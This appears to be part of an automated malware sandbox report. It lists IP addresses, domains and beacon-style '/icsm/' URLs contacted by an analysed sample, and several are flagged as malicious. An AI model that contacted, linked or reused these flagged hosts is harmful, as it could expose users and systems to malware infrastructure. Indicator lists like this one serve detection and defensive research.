34.102.136.180 | susanestuart.com | United States | 15169 | GOOGLEUS | false
85.233.160.22 | fwd3.hosts.co.uk | United Kingdom | 8622 | ISIONUKNamescoLimitedGB | true
8.210.40.49 | www.hdjakdhf.com | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
150.95.255.38 | www.year-action.xyz | Japan | 7506 | INTERQGMOInternetIncJP | true

Contacted Domains

Name | IP | Active
www.roastedorganic.com | 75.2.115.196 | true
www.year-action.xyz | 150.95.255.38 | true
www.geacasolaro.com | 62.149.189.71 | true
voiceclubdubai.com | 91.148.168.141 | true
www.hdjakdhf.com | 8.210.40.49 | true
susanestuart.com | 34.102.136.180 | true
fwd3.hosts.co.uk | 85.233.160.22 | true
www.thelordnelsonwinthorpe.com | 94.136.40.51 | true
shops.myshopify.com | 23.227.38.74 | true
www.algaeflipflops.com | 64.190.62.111 | true
www.charmboutiques.com | unknown | unknown
www.shanghainternational.com | unknown | unknown
www.voiceclubdubai.com | unknown | unknown
www.websitemax.co.uk | unknown | unknown
www.susanestuart.com | unknown | unknown
www.w-c727or.net | unknown | unknown
www.kantan-sedori.com | unknown | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.geacasolaro.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh | true | Avira URL Cloud: safe | unknown
http://www.hdjakdhf.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp | true | Avira URL Cloud: safe | unknown
http://www.voiceclubdubai.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH | true | Avira URL Cloud: safe | unknown
http://www.year-action.xyz/icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT | true | Avira URL Cloud: safe | unknown
http://www.websitemax.co.uk/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R | true | Avira URL Cloud: safe | unknown
http://www.roastedorganic.com/icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT | true | Avira URL Cloud: safe | unknown
www.voiceclubdubai.com/icsm/ | true | Avira URL Cloud: safe | low
http://www.susanestuart.com/icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT | false | Avira URL Cloud: safe | unknown